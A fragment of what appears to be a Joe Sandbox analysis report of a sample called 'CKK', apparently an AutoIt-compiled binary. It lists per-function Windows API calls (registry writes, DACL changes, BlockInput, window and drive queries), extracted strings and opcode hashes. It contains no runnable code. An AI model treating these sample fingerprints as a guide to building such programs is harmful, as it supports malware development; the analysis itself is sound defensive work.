                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Variable is not of type 'Object'.
                                          • API String ID: 0-1840281001
                                          • Opcode ID: 2e5ee6b43ee8acbc7cd6757aeb92892937420d21b40da9b904172e2a324a2b07
                                          • Instruction ID: 3895e5ae798c2d95135c5af48b799497c9a463ae74e532670823b01b8408a686
                                          • Opcode Fuzzy Hash: 2e5ee6b43ee8acbc7cd6757aeb92892937420d21b40da9b904172e2a324a2b07
                                          • Instruction Fuzzy Hash: 4D328C70A01218DFCF54DF90E881AEDB7F5BF04308F646069E806BB292D775AE49CB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?), ref: 00E76998
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ExceptionRaise
                                          • String ID:
                                          • API String ID: 3997070919-0
                                          • Opcode ID: c4e062eb8f3ef88bf291c4039619f478634e0f4db52d0be5de11fc8545ebe67c
                                          • Instruction ID: 288c9deec47d916d0f88ff407f3ef69113f65278fb31594c8d494ade3caa8b58
                                          • Opcode Fuzzy Hash: c4e062eb8f3ef88bf291c4039619f478634e0f4db52d0be5de11fc8545ebe67c
                                          • Instruction Fuzzy Hash: D1B15A31510A099FEB19CF28C486BA47BA0FF4536CF25D658E99DDF2A2C335D985CB40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DeleteObject.GDI32(00000000), ref: 00EC2B30
                                          • DeleteObject.GDI32(00000000), ref: 00EC2B43
                                          • DestroyWindow.USER32 ref: 00EC2B52
                                          • GetDesktopWindow.USER32 ref: 00EC2B6D
                                          • GetWindowRect.USER32(00000000), ref: 00EC2B74
                                          • SetRect.USER32 ref: 00EC2CA3
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00EC2CB1
                                          • CreateWindowExW.USER32 ref: 00EC2CF8
                                          • GetClientRect.USER32 ref: 00EC2D04
                                          • CreateWindowExW.USER32 ref: 00EC2D40
                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00EC2D62
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00EC2D75
                                          • GlobalAlloc.KERNEL32 ref: 00EC2D80
                                          • GlobalLock.KERNEL32 ref: 00EC2D89
                                          • ReadFile.KERNEL32 ref: 00EC2D98
                                          • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00EC2DA1
                                          • CloseHandle.KERNEL32(00000000), ref: 00EC2DA8
                                          • GlobalFree.KERNEL32 ref: 00EC2DB3
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00EC2DC5
                                          • OleLoadPicture.OLEAUT32 ref: 00EC2DDB
                                          • GlobalFree.KERNEL32 ref: 00EC2DEB
                                          • CopyImage.USER32 ref: 00EC2E11
                                          • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00EC2E30
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00EC2E52
                                          • ShowWindow.USER32(00000004), ref: 00EC303F
                                          Strings
                                          Similarity
                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                          • String ID: $AutoIt v3$DISPLAY$static
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 00ED712F
                                          • GetSysColorBrush.USER32 ref: 00ED7160
                                          • GetSysColor.USER32 ref: 00ED716C
                                          • SetBkColor.GDI32(?,000000FF), ref: 00ED7186
                                          • SelectObject.GDI32 ref: 00ED7195
                                          • InflateRect.USER32 ref: 00ED71C0
                                          • GetSysColor.USER32 ref: 00ED71C8
                                          • CreateSolidBrush.GDI32 ref: 00ED71CF
                                          • FrameRect.USER32 ref: 00ED71DE
                                          • DeleteObject.GDI32(00000000), ref: 00ED71E5
                                          • InflateRect.USER32 ref: 00ED7230
                                          • FillRect.USER32 ref: 00ED7262
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED7284
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7421
                                            • Part of subcall function 00ED73E8: SetTextColor.GDI32(?,?), ref: 00ED7425
                                            • Part of subcall function 00ED73E8: GetSysColorBrush.USER32 ref: 00ED743B
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7446
                                            • Part of subcall function 00ED73E8: GetSysColor.USER32 ref: 00ED7463
                                            • Part of subcall function 00ED73E8: CreatePen.GDI32 ref: 00ED7471
                                            • Part of subcall function 00ED73E8: SelectObject.GDI32 ref: 00ED7482
                                            • Part of subcall function 00ED73E8: SetBkColor.GDI32(?,00000000), ref: 00ED748B
                                            • Part of subcall function 00ED73E8: SelectObject.GDI32 ref: 00ED7498
                                            • Part of subcall function 00ED73E8: InflateRect.USER32 ref: 00ED74B7
                                            • Part of subcall function 00ED73E8: RoundRect.GDI32 ref: 00ED74CE
                                            • Part of subcall function 00ED73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00ED74DB
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32 ref: 00E58E14
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 00E96AC5
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00E96AFE
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00E96F43
                                            • Part of subcall function 00E58F62: InvalidateRect.USER32(?,00000000,00000001), ref: 00E58FC5
                                          • SendMessageW.USER32(?,00001053), ref: 00E96F7F
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00E96F96
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E96FAC
                                          • ImageList_Destroy.COMCTL32(00000000,?), ref: 00E96FB7
                                          Strings
                                          Similarity
                                          • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 2760611726-4108050209
                                          • Opcode ID: 6c8cb1f6cb4c5175acbf6c2fe1a67ffe81d6365db8f0ab4d8ce9395852b4b5d8
                                          • Instruction ID: c343cd5c512723a429fc8696b2de08031cfb253d03dade884c5bf1002dad8b69
                                          • Opcode Fuzzy Hash: 6c8cb1f6cb4c5175acbf6c2fe1a67ffe81d6365db8f0ab4d8ce9395852b4b5d8
                                          • Instruction Fuzzy Hash: 2B12EC30201201EFDB25CF24D985BAAB7F1FB44305F64A42AF995BB261CB31EC56DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DestroyWindow.USER32 ref: 00EC273E
                                          • SystemParametersInfoW.USER32 ref: 00EC286A
                                          • SetRect.USER32 ref: 00EC28A9
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00EC28B9
                                          • CreateWindowExW.USER32 ref: 00EC2900
                                          • GetClientRect.USER32 ref: 00EC290C
                                          • CreateWindowExW.USER32 ref: 00EC2955
                                          • CreateDCW.GDI32 ref: 00EC2964
                                          • GetStockObject.GDI32 ref: 00EC2974
                                          • SelectObject.GDI32 ref: 00EC2978
                                          • GetTextFaceW.GDI32 ref: 00EC2988
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC2991
                                          • DeleteDC.GDI32 ref: 00EC299A
                                          • CreateFontW.GDI32 ref: 00EC29C6
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00EC29DD
                                          • CreateWindowExW.USER32 ref: 00EC2A1D
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00EC2A31
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00EC2A42
                                          • CreateWindowExW.USER32 ref: 00EC2A77
                                          • GetStockObject.GDI32 ref: 00EC2A82
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00EC2A8D
                                          • ShowWindow.USER32(00000004), ref: 00EC2A97
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 622af39e8d8297870e511d33b3c4cca8ccd49367dd94bed867a907842baaa71f
                                          • Instruction ID: 4a030619d16aba4dbd159d14c1a026e0f3e2e57f5f9ca204d2b43cbb28306a59
                                          • Opcode Fuzzy Hash: 622af39e8d8297870e511d33b3c4cca8ccd49367dd94bed867a907842baaa71f
                                          • Instruction Fuzzy Hash: DAB15D71A00219AFEB14DF69DD85FAEBBA9FB48710F108519FA14EB290D774ED01CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 00EB4AED
                                          • GetDriveTypeW.KERNEL32 ref: 00EB4BCA
                                          • SetErrorMode.KERNEL32(00000000), ref: 00EB4D36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: fac8c8204e0fe19e7a885f1839b95069b2ffad6c234be0cc1afa3d67f160cc3b
                                          • Instruction ID: 697f2f391c1b6108d36f96d29e07087026614b21abfa2262b266196be4a2461e
                                          • Opcode Fuzzy Hash: fac8c8204e0fe19e7a885f1839b95069b2ffad6c234be0cc1afa3d67f160cc3b
                                          • Instruction Fuzzy Hash: 5961C4B16061069BDB04DF14CA81AFABBA0AB44B44B20A415F846FB6D3DB35ED45FF42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 8eda192c776775b5ffa6926f5397aeb64a781738215cf8a5e97db992684023b9
                                          • Instruction ID: 7b3e91065f736fb192d551bc820d4e2502216e8e63f0c4017f3366ea38885848
                                          • Opcode Fuzzy Hash: 8eda192c776775b5ffa6926f5397aeb64a781738215cf8a5e97db992684023b9
                                          • Instruction Fuzzy Hash: 05617E72901219AFDF019FA5EC49EEEBFB9EB08360F204116F915BB2A1D7709941CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00ED1128
                                          • GetDesktopWindow.USER32 ref: 00ED113D
                                          • GetWindowRect.USER32(00000000), ref: 00ED1144
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00ED1199
                                          • DestroyWindow.USER32 ref: 00ED11B9
                                          • CreateWindowExW.USER32 ref: 00ED11ED
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00ED120B
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00ED121D
                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00ED1232
                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00ED1245
                                          • IsWindowVisible.USER32(00000000), ref: 00ED12A1
                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00ED12BC
                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00ED12D0
                                          • GetWindowRect.USER32(00000000,?), ref: 00ED12E8
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00ED130E
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00ED1328
                                          • CopyRect.USER32(?,?), ref: 00ED133F
                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00ED13AA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 77575c93e99b111f8decd8eba502c17c7378c6b4bc3189c95f24cfa1fa4e4881
                                          • Instruction ID: da723d3c6420e06c84cacd83655ebf8bbdd0553d6d8445937e901d0932896e4e
                                          • Opcode Fuzzy Hash: 77575c93e99b111f8decd8eba502c17c7378c6b4bc3189c95f24cfa1fa4e4881
                                          • Instruction Fuzzy Hash: DDB19C71608341AFD700DF65D884B6BFBE4FF88744F00995AF999AB2A1C731E845CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00ED02E5
                                          • _wcslen.LIBCMT ref: 00ED031F
                                          • _wcslen.LIBCMT ref: 00ED0389
                                          • _wcslen.LIBCMT ref: 00ED03F1
                                          • _wcslen.LIBCMT ref: 00ED0475
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00ED04C5
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00ED0504
                                            • Part of subcall function 00E5F9F2: _wcslen.LIBCMT ref: 00E5F9FD
                                            • Part of subcall function 00EA223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EA2258
                                            • Part of subcall function 00EA223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EA228A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 1103490817-719923060
                                          • Opcode ID: bdca0238a45da6816cd0491265ba1604588ca77f9db37f757a7e22866955f290
                                          • Instruction ID: 11168c712190625e69fcf231d30ba7ef5f8517f35ee2cd04e13d4ed4f131ad81
                                          • Opcode Fuzzy Hash: bdca0238a45da6816cd0491265ba1604588ca77f9db37f757a7e22866955f290
                                          • Instruction Fuzzy Hash: A6E19D316082018BC714DF24D550A6AB3E6FFC8318F18695EF896BB7A2DB30ED46DB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SystemParametersInfoW.USER32 ref: 00E58968
                                          • GetSystemMetrics.USER32 ref: 00E58970
                                          • SystemParametersInfoW.USER32 ref: 00E5899B
                                          • GetSystemMetrics.USER32 ref: 00E589A3
                                          • GetSystemMetrics.USER32 ref: 00E589C8
                                          • SetRect.USER32 ref: 00E589E5
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E589F5
                                          • CreateWindowExW.USER32 ref: 00E58A28
                                          • SetWindowLongW.USER32 ref: 00E58A3C
                                          • GetClientRect.USER32 ref: 00E58A5A
                                          • GetStockObject.GDI32 ref: 00E58A76
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E58A81
                                            • Part of subcall function 00E5912D: GetCursorPos.USER32(?), ref: 00E59141
                                            • Part of subcall function 00E5912D: ScreenToClient.USER32(00000000,?), ref: 00E5915E
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E59183
                                            • Part of subcall function 00E5912D: GetAsyncKeyState.USER32 ref: 00E5919D
                                          • SetTimer.USER32(00000000,00000000,00000028,00E590FC), ref: 00E58AA8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 946b04e1571a1c5811f008c24649b27daea8bc641e72b9adfd3104164745c8f0
                                          • Instruction ID: 73f8f8ee1e6f29df2936b7f1b377a37e27838e6dc3b269f5826552ca37b6aa5a
                                          • Opcode Fuzzy Hash: 946b04e1571a1c5811f008c24649b27daea8bc641e72b9adfd3104164745c8f0
                                          • Instruction Fuzzy Hash: 5FB17831A0020A9FDF14DFA8D945BEA3BB5FB48355F11962AFA15BB290DB30E845CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00EA1114
                                            • Part of subcall function 00EA10F9: GetLastError.KERNEL32 ref: 00EA1120
                                            • Part of subcall function 00EA10F9: GetProcessHeap.KERNEL32 ref: 00EA112F
                                            • Part of subcall function 00EA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00EA0B9B,?,?,?), ref: 00EA1136
                                            • Part of subcall function 00EA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00EA114D
                                          • GetSecurityDescriptorDacl.ADVAPI32 ref: 00EA0DF5
                                          • GetAclInformation.ADVAPI32 ref: 00EA0E29
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0E40
                                          • GetAce.ADVAPI32 ref: 00EA0E7A
                                          • AddAce.ADVAPI32 ref: 00EA0E96
                                          • GetLengthSid.ADVAPI32(?), ref: 00EA0EAD
                                          • GetProcessHeap.KERNEL32 ref: 00EA0EB5
                                          • HeapAlloc.KERNEL32(00000000), ref: 00EA0EBC
                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00EA0EDD
                                          • CopySid.ADVAPI32 ref: 00EA0EE4
                                          • AddAce.ADVAPI32 ref: 00EA0F13
                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00EA0F35
                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00EA0F47
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F6E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F75
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F7E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F85
                                          • GetProcessHeap.KERNEL32 ref: 00EA0F8E
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0F95
                                          • GetProcessHeap.KERNEL32 ref: 00EA0FA1
                                          • HeapFree.KERNEL32(00000000), ref: 00EA0FA8
                                            • Part of subcall function 00EA1193: GetProcessHeap.KERNEL32 ref: 00EA11A1
                                            • Part of subcall function 00EA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00EA0BB1,?), ref: 00EA11A8
                                            • Part of subcall function 00EA1193: InitializeSecurityDescriptor.ADVAPI32 ref: 00EA11B7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                          • String ID:
                                          • API String ID: 4175595110-0
                                          • Opcode ID: 29a3ac5c173e3f594fb304f76c91bee8de59c3c3314ea47b540e777d058b093a
                                          • Instruction ID: 16fbed68407c8c04fae7a95c7b455eb0cf3460c74a471ad37adb8cd05d57456c
                                          • Opcode Fuzzy Hash: 29a3ac5c173e3f594fb304f76c91bee8de59c3c3314ea47b540e777d058b093a
                                          • Instruction Fuzzy Hash: 8E717F75A0121AEFDF209FA5EC44BAEBBB8FF09345F148116F915BA191D730A905CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ECC4BD
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EDCC08,00000000,?,00000000,?,?), ref: 00ECC544
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECC5A4
                                          • _wcslen.LIBCMT ref: 00ECC5F4
                                          • _wcslen.LIBCMT ref: 00ECC66F
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC6B2
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC7C1
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC84D
                                          • RegCloseKey.ADVAPI32(?), ref: 00ECC881
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00ECC88E
                                          • RegSetValueExW.ADVAPI32 ref: 00ECC960
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.447687352.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                          • Associated: 00000003.00000002.447679499.0000000000E40000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000EDC000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447790106.0000000000F0C000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000003.00000002.447798752.0000000000F14000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_e40000_CKK.jbxd
                                          Similarity
                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 9721498-966354055
                                          • Opcode ID: da557de0655b7166037ceb85b7c082a90f7949c9c483b363f3f355186cafad8d
                                          • Instruction ID: d19c3d68e5046ad5af4452db1188b4be7f871359e62b27b8531d50cdd2cce932
                                          • Opcode Fuzzy Hash: da557de0655b7166037ceb85b7c082a90f7949c9c483b363f3f355186cafad8d
                                          • Instruction Fuzzy Hash: 421258756042019FDB14DF14D981F2AB7E5EF88714F14985DF88AAB2A2DB35FC42CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00ED09C6
                                          • _wcslen.LIBCMT ref: 00ED0A01
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00ED0A54
